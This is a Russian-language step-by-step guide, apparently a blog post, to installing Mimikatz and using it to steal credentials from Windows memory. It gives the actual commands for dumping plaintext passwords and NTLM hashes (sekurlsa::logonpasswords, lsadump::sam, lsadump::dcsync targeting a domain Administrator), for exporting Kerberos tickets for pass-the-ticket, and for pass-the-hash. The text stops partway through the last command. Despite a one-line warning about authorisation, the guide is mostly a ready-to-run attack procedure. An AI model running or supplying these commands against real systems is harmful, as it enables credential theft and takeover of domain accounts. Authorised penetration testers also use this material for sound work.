Mimikatz – это мощный инструмент, предназначенный для извлечения из памяти паролей, хэшей, PIN-кодов и билетов Kerberos в открытом виде. Он широко используется специалистами по тестированию на проникновение и профессионалами по безопасности для оценки уязвимости систем. В этом руководстве представлен пошаговый подход к установке и использованию Mimikatz для этического тестирования безопасности.
Предупреждение: Несанкционированное использование Mimikatz является незаконным. Убедитесь, что у вас есть разрешение, прежде чем использовать его в любой среде.
Перед установкой Mimikatz убедитесь, что у вас есть следующее:
Mimikatz – это инструмент с открытым исходным кодом, доступный на GitHub. Чтобы загрузить его:
Также вы можете клонировать репозиторий с помощью Git:
git clone https://github.com/gentilkiwi/mimikatz.git
Поскольку для запуска Mimikatz требуются привилегии администратора, выполните следующие действия:
cd path\to\mimikatz\x64
mimikatz.exe
mimikatz #
.Прежде чем извлекать учетные данные, убедитесь, что у вас достаточно привилегий:
privilege::debug
В случае успеха вы должны увидеть: Привилегия '20' OK
Чтобы извлечь пароли из памяти, используйте команду:
sekurlsa::logonpasswords
Это выведет имя пользователя, домен и пароли в открытом виде, если они доступны.
Хеши NTLM могут быть использованы для атак типа “передай хэш”. Чтобы извлечь их, выполните команду:
lsadump::sam
Или, для удаленных систем:
lsadump::dcsync /domain:targetdomain.com /user:Administrator
Извлечение билетов Kerberos из системы:
sekurlsa::tickets /export
Это экспортирует файлы .kirbi
, которые могут быть использованы в атаках типа “передай билет”.
Для аутентификации с помощью NTLM-хэша вместо пароля:
sekurlsa::pth /user:Administrator /domain:example.com /ntlm: